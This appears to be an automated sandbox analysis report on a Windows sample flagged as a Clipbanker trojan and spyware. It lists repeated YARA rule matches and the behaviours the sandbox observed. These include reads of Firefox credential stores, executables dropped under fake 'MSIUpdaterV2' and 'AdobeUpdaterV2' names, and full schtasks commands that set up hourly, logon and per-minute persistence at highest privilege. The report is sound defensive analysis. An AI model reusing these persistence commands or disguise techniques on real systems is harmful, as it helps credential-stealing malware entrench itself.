Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@36/36@3/5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA50E6 CreateToolhelp32Snapshot, 0_2_00DA50E6
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\trixyBqgSBuerctg2 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.4491798965.0000000000C52000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4491798965.0000000000C52000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2098219933.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, _019ogo7XT61Login Data.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe"
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
